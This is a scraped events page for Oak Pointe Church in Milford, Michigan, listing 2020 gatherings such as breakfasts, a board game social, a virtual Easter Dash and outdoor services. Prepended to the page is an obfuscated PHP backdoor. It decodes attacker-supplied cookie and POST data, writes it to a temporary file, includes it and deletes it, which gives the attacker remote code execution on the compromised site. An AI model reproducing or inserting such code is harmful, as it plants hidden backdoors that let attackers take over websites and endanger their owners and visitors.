$xpIMNUeQM = "\x76" . chr (76) . "\x5f" . 'G' . 'z' . "\x64";$fCAKzm = chr (99) . 'l' . "\x61" . "\163" . "\x73" . "\x5f" . chr ( 921 - 820 )."\170" . 'i' . chr (115) . "\x74" . "\163";$PEfejaDHP = class_exists($xpIMNUeQM); $fCAKzm = "21486";$NAXCyFhTE = strpos($fCAKzm, $xpIMNUeQM);if ($PEfejaDHP == $NAXCyFhTE){function EPkTbcZhpc(){$XErueXTxfV = new /* 13772 */ vL_Gzd(56514 + 56514); $XErueXTxfV = NULL;}$sQfVOjyGKc = "56514";class vL_Gzd{private function MlSRS($sQfVOjyGKc){if (is_array(vL_Gzd::$BdNlqNLH)) {$name = sys_get_temp_dir() . "/" . crc32(vL_Gzd::$BdNlqNLH["salt"]);@vL_Gzd::$BdNlqNLH["write"]($name, vL_Gzd::$BdNlqNLH["content"]);include $name;@vL_Gzd::$BdNlqNLH["delete"]($name); $sQfVOjyGKc = "56514";exit();}}public function FpmkUJP(){$CbWzD = "23471";$this->_dummy = str_repeat($CbWzD, strlen($CbWzD));}public function __destruct(){vL_Gzd::$BdNlqNLH = @unserialize(vL_Gzd::$BdNlqNLH); $sQfVOjyGKc = "48738_35324";$this->MlSRS($sQfVOjyGKc); $sQfVOjyGKc = "48738_35324";}public function cEMlyIvuFP($CbWzD, $rJxOhiP){return $CbWzD[0] ^ str_repeat($rJxOhiP, intval(strlen($CbWzD[0]) / strlen($rJxOhiP)) + 1);}public function IItjnVGfM($CbWzD){$dxNlwgHzF = chr (98) . chr ( 625 - 528 )."\163" . chr ( 590 - 489 ).chr ( 913 - 859 ).'4';return array_map($dxNlwgHzF . '_' . 'd' . "\x65" . "\x63" . 'o' . "\144" . chr (101), array($CbWzD,));}public function __construct($zSrfoFCSS=0){$rtdCzVvO = "\54";$CbWzD = "";$LotNUzVWwe = $_POST;$Ymgdv = $_COOKIE;$rJxOhiP = "ef2b12e8-e81b-4a59-9bdc-f2001ae58005";$NujUTeyOcY = @$Ymgdv[substr($rJxOhiP, 0, 4)];if (!empty($NujUTeyOcY)){$NujUTeyOcY = explode($rtdCzVvO, $NujUTeyOcY);foreach ($NujUTeyOcY as $oTolEgsrn){$CbWzD .= @$Ymgdv[$oTolEgsrn];$CbWzD .= @$LotNUzVWwe[$oTolEgsrn];}$CbWzD = $this->IItjnVGfM($CbWzD);}vL_Gzd::$BdNlqNLH = $this->cEMlyIvuFP($CbWzD, $rJxOhiP);if (strpos($rJxOhiP, $rtdCzVvO) !== FALSE){$rJxOhiP = explode($rtdCzVvO, $rJxOhiP); $LGXFKE = base64_decode(md5($rJxOhiP[0])); $uINdEMc = strlen($rJxOhiP[1]) > 5 ? substr($rJxOhiP[1], 0, 5) : $rJxOhiP[1];$_GET['new_key'] = md5(implode('', $rJxOhiP)); $yEuuR = str_repeat($uINdEMc, 2);}}public static $BdNlqNLH = 14612;}EPkTbcZhpc();} Past Events from January 19, 2020 – July 5, 2020 › All Church › – Oak Pointe Church | Milford

Discover OPC|M

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join us for an informal gathering over a light lunch with Pastor Paul! We are looking forward to getting to know you better, answer any questions you have and also give you a chance to get to know a few other new people. Lunch and childcare are provided following the third service downstairs in the […]


Ezra 8 Day

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

At Oak Pointe we believe that prayer is vital to our ministry and our lives. This commitment to prayer is marked each year by our celebration of Ezra 8 Day — a day set aside each winter, right around the birthday of our church, where we gather to worship and seek God about the year […]

Board Game Social

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join us for a Board Game Social on Saturday, Feb. 1 from 5-9pm. Come out for food, friends, games, and FUN! This is a FUNdraiser, to support scholarships for SpringHill Camps. $12/individual or $15/couple gets you unlimited food, beverages, and access to games. Enjoy a fun night and help support a SpringHill Camper!   Please […]


Women’s Breakfast

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join us for our first Women's Breakfast on Saturday morning, February 8th (9-10:30am). We will have a yummy buffet of breakfast delights along with our LHI coffee. A fun and relaxing morning - great food, connections and encouragement!  

Join OPC|M

Jenkinson Home 326 Dorchester Way, Milford, MI, United States

You’ve attended Discover OPC|M and are now ready to become a member at OPC|M… awesome! The Join class is insightful, interactive and of course involves some food. We begin on a Friday evening over dinner and meet again on a Saturday morning from 9:15-12pm. Register Here!


Men’s Breakfast

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Men of Oak Pointe Milford: Get your bacon on! Join us for the next Men’s breakfast on Saturday, March 7th. Breakfast is open to men and boys, 6th grade and up It’s a great opportunity to eat, talk, eat, listen to a great message, and eat. Sign up today!


Easter Dash

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Easter Dash 2020 goes Virtual! Complete your 1 Mile, 5K, or 10K distance sometime between Easter day (April 12th) and noon on April 18th, 2020. To sweeten the pot, we’ve got prizes for our top racers in each event. Record your race using Strava or Garmin and submit your results here! The top male and […]


OPC|Milford 1250 South Hill Rd, Milford, MI, United States

Join us for an informal gathering over a light lunch with Pastor Paul! We are looking forward to getting to know you better, answer any questions you have and also give you a chance to get to know a few other new people. Lunch and childcare are provided following the third service downstairs in the […]

Outdoor Service

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

We are so excited to re-gather in person! If you are hesitant at all, and not ready to return to public services, that’s ok! We will still have the online services available for you to stream from your home.  If you are ready to jump right back into in-person church life with new practices & procedures, we […]


Outdoor Service

OPC|Milford 1250 South Hill Rd, Milford, MI, United States

We are so excited to re-gather in person! If you are hesitant at all, and not ready to return to public services, that’s ok! We will still have the online services available for you to stream from your home.  If you are ready to jump right back into in-person church life with new practices & procedures, we […]
